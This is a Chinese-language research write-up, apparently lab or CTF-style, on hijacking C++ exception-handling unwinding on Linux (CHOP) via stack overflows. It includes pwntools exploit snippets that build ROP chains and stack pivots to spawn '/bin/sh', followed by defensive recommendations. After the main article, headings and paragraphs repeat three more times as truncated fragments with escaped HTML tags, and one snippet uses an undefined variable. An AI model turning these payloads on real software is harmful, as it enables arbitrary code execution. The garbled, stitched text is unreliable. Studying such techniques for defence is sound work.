Linux下C++异常处理溢出漏洞攻击手法研究<\/h1>

1. 基础知识<\/h2>

1.1 异常处理机制<\/h3>
本文针对Linux下C++基于eh_frame进行unwind的异常处理流程的攻击手法进行研究。异常处理流程在不同操作系统和语言上有差异，需具体问题具体对待。<\/p>

1.2 关键编译参数<\/h3>

-fomit-frame-pointer<\/code>：省略不需要帧指针的函数的帧指针，节省寄存器空间<\/li>
-no-pie<\/code>：禁用位置无关可执行文件<\/li>
-static<\/code>：静态链接<\/li>

-fomit-frame-pointer<\/code>的影响：使程序不依赖rbp存储栈帧，仅通过rsp调整栈位置<\/li>
<\/ul>
1.3 Canary特性<\/h3>
Canary及__stack_chk_fail()<\/code>并非在所有栈帧中都包含，只放置在可能出现栈溢出的地方。<\/p>
2. 从CHOP到ROP攻击<\/h2>
2.1 基本攻击思路<\/h3>
通过覆盖返回地址来控制不同的catch handler调用，从而控制程序流。<\/p>
2.2 攻击步骤<\/h3>

劫持程序流到backdoor函数的catch块<\/li>
观察返回地址（如__libc_start_call_main<\/code>）<\/li>
利用Canary特性继续溢出，劫持catch handler的返回地址<\/li>
<\/ol>
2.3 关键条件<\/h3>

溢出点地址必须比catch handler的栈地址低<\/li>
异常处理流程中的栈展开（栈回退）保证了这一点<\/li>
<\/ul>
2.4 实际测试<\/h3>

构造payload覆盖handler的返回地址<\/li>
劫持返回地址为backdoor()<\/li>
进一步构造ROP链调用sys_execve("\/bin\/sh",0,0)<\/code><\/li>
<\/ol>
2.5 示例exp关键点<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>context.<\/span>log_level =<\/span> 'debug'<\/span>
<\/span><\/span>context.<\/span>arch =<\/span> 'amd64'<\/span>
<\/span><\/span>context.<\/span>os =<\/span> 'linux'<\/span>
<\/span><\/span>
<\/span><\/span>io =<\/span> process('.\/pwn'<\/span>)
<\/span><\/span>
<\/span><\/span># 定义gadget地址<\/span>
<\/span><\/span>pop_rdi =<\/span> 0x000000000040291c<\/span>
<\/span><\/span>pop_rsi =<\/span> 0x0000000000404009<\/span>
<\/span><\/span>pop_rdx_rbx =<\/span> 0x000000000049775b<\/span>
<\/span><\/span>pop_rax =<\/span> 0x0000000000462f37<\/span>
<\/span><\/span>syscall =<\/span> 0x000000000040fac9<\/span>
<\/span><\/span>read_addr =<\/span> 0x4624D0<\/span>
<\/span><\/span>binsh =<\/span> 0x4d7000<\/span>
<\/span><\/span>
<\/span><\/span># 构造payload<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'a'<\/span> *<\/span> 0x28<\/span>
<\/span><\/span>payload +=<\/span> p64(backdoor_try +<\/span> 1<\/span>)
<\/span><\/span>payload +=<\/span> b<\/span>'b'<\/span> *<\/span> 0x18<\/span>
<\/span><\/span>payload +=<\/span> p64(pop_rdi)
<\/span><\/span>payload +=<\/span> p64(0<\/span>)
<\/span><\/span>payload +=<\/span> p64(pop_rsi)
<\/span><\/span>payload +=<\/span> p64(binsh)
<\/span><\/span>payload +=<\/span> p64(pop_rdx_rbx)
<\/span><\/span>payload +=<\/span> p64(0x8<\/span>)
<\/span><\/span>payload +=<\/span> p64(0<\/span>)
<\/span><\/span>payload +=<\/span> p64(read_addr)
<\/span><\/span># ... 更多ROP链构造<\/span>
<\/span><\/span><\/code><\/pre>3. CHOP与栈转移攻击<\/h2>
3.1 攻击场景<\/h3>
当程序使用rbp作为栈帧寄存器时（不使用-fomit-frame-pointer<\/code>参数）<\/p>
3.2 基本思路<\/h3>

通过覆盖rbp进行栈转移<\/li>
在bss段伪造栈底<\/li>
构造二次溢出实现ROP<\/li>
<\/ol>
3.3 详细攻击步骤<\/h3>


第一次溢出<\/strong>：<\/p>

用name变量在bss段伪造栈底<\/li>
覆盖rbp为name变量地址<\/li>
设置返回地址为test函数地址<\/li>
<\/ul>
<\/li>

第二次溢出<\/strong>：<\/p>

在bss上留下\/bin\/sh<\/code>字符串<\/li>
在read的返回地址处构造ROP链<\/li>
利用栈转移控制程序流<\/li>
<\/ul>
<\/li>
<\/ol>
3.4 关键技巧<\/h3>

控制rbp使rbp和rsp空隙足够小<\/li>
跳过test函数最初的栈帧控制区域<\/li>
利用call read<\/code>时返回地址会被push到栈的特性<\/li>
<\/ul>
3.5 示例exp关键点<\/h3>
name_addr =<\/span> 0x4D93D0<\/span>
<\/span><\/span>test_addr =<\/span> 0x401a9d<\/span>
<\/span><\/span>
<\/span><\/span># 第一次payload构造栈转移<\/span>
<\/span><\/span>payload =<\/span> p64(name_addr) +<\/span> p64(test_addr)
<\/span><\/span>
<\/span><\/span># 第二次payload构造ROP<\/span>
<\/span><\/span>payload =<\/span> b<\/span>'\/bin\/sh<\/span>\x00<\/span>'<\/span>
<\/span><\/span>payload +=<\/span> p64(0<\/span>) *<\/span> 6<\/span>
<\/span><\/span>payload +=<\/span> p64(pop_rdi)
<\/span><\/span>payload +=<\/span> p64(binsh)
<\/span><\/span>payload +=<\/span> p64(pop_rsi)
<\/span><\/span>payload +=<\/span> p64(0<\/span>)
<\/span><\/span>payload +=<\/span> p64(pop_rdx_rbx)
<\/span><\/span>payload +=<\/span> p64(0<\/span>)
<\/span><\/span>payload +=<\/span> p64(0<\/span>)
<\/span><\/span>payload +=<\/span> p64(pop_rax)
<\/span><\/span>payload +=<\/span> p64(0x3b<\/span>)
<\/span><\/span>payload +=<\/span> p64(syscall)
<\/span><\/span><\/code><\/pre>4. 总结与关键点<\/h2>
4.1 主要攻击手法<\/h3>


混淆unwinder<\/strong>：<\/p>

使异常被其他函数的catch handler捕获<\/li>
利用libc\/c++内原有的Golden Gadget实现任意函数调用<\/li>
<\/ul>
<\/li>

不使用rbp的情况<\/strong>：<\/p>

直接在合适的catch handler中进行ROP<\/li>
<\/ul>
<\/li>

使用rbp的情况<\/strong>：<\/p>

配合栈转移效果，在bss等区域做ROP<\/li>
<\/ul>
<\/li>
<\/ol>
4.2 理论可行方案<\/h3>

利用clean up中的析构函数构造UAF<\/li>
利用clean up和_Unwind_Resume()<\/code>构造执行链（类似ROP思想）<\/li>
<\/ol>
4.3 防御建议<\/h3>

避免使用-fomit-frame-pointer<\/code>参数<\/li>
在所有异常处理中添加栈保护<\/li>
对全局变量和堆操作进行严格边界检查<\/li>
使用现代编译器的安全特性（如CFI）<\/li>
<\/ol>

Linux下C++异常处理溢出漏洞攻击手法研究<\/h1>

1. 基础知识<\/h2>

1.1 异常处理机制<\/h3>
本文针对Linux下C++基于eh_frame进行unwind的异常处理流程的攻击手法进行研究。异常处理流程在不同操作系统和语言上有差异，需具体问题具体对待。<\/p>

1.3 Canary特性<\/h3>
Canary及`__stack_chk_fail()<\/code>并非在所有栈帧中都包含，只放置在可能出现栈溢出的地方。<\/p>`

2.1 基本攻击思路<\/h3>
通过覆盖返回地址来控制不同的catch handler调用，从而控制程序流。<\/p>

3. CHOP与栈转移攻击<\/h2>

3.1 攻击场景<\/h3>
当程序使用rbp作为栈帧寄存器时（不使用`-fomit-frame-pointer<\/code>参数）<\/p>`

4. 总结与关键点<\/h2>

4.3 防御建议<\/h3>

避免使用`-fomit-frame-pointer<\/code>参数<\/li>`
`在所有异常处理中添加栈保护<\/li>`
`对全局变量和堆操作进行严格边界检查<\/li>`
`使用现代编译器的安全特性（如CFI）<\/li> <\/ol>`

Linux下C++异常处理溢出漏洞攻击手法研究<\/h1>

1. 基础知识<\/h2>

1.1 异常处理机制<\/h3> 本文针对Linux下C++基于eh_frame进行unwind的异常处理流程的攻击手法进行研究。异常处理流程在不同操作系统和语言上有差异，需具体问题具体对待。<\/p>

1.3 Canary特性<\/h3> Canary及__stack_chk_fail()<\/code>并非在所有栈帧中都包含，只放置在可能出现栈溢出的地方。<\/p>

2.1 基本攻击思路<\/h3> 通过覆盖返回地址来控制不同的catch handler调用，从而控制程序流。<\/p>

3. CHOP与栈转移攻击<\/h2>

3.1 攻击场景<\/h3> 当程序使用rbp作为栈帧寄存器时（不使用-fomit-frame-pointer<\/code>参数）<\/p>

4. 总结与关键点<\/h2>

4.3 防御建议<\/h3> 避免使用-fomit-frame-pointer<\/code>参数<\/li> 在所有异常处理中添加栈保护<\/li> 对全局变量和堆操作进行严格边界检查<\/li> 使用现代编译器的安全特性（如CFI）<\/li> <\/ol>

1.1 异常处理机制<\/h3>
本文针对Linux下C++基于eh_frame进行unwind的异常处理流程的攻击手法进行研究。异常处理流程在不同操作系统和语言上有差异，需具体问题具体对待。<\/p>

1.3 Canary特性<\/h3>
Canary及`__stack_chk_fail()<\/code>并非在所有栈帧中都包含，只放置在可能出现栈溢出的地方。<\/p>`

2.1 基本攻击思路<\/h3>
通过覆盖返回地址来控制不同的catch handler调用，从而控制程序流。<\/p>

3.1 攻击场景<\/h3>
当程序使用rbp作为栈帧寄存器时（不使用`-fomit-frame-pointer<\/code>参数）<\/p>`

4.3 防御建议<\/h3>

避免使用`-fomit-frame-pointer<\/code>参数<\/li>`
`在所有异常处理中添加栈保护<\/li>`
`对全局变量和堆操作进行严格边界检查<\/li>`
`使用现代编译器的安全特性（如CFI）<\/li> <\/ol>`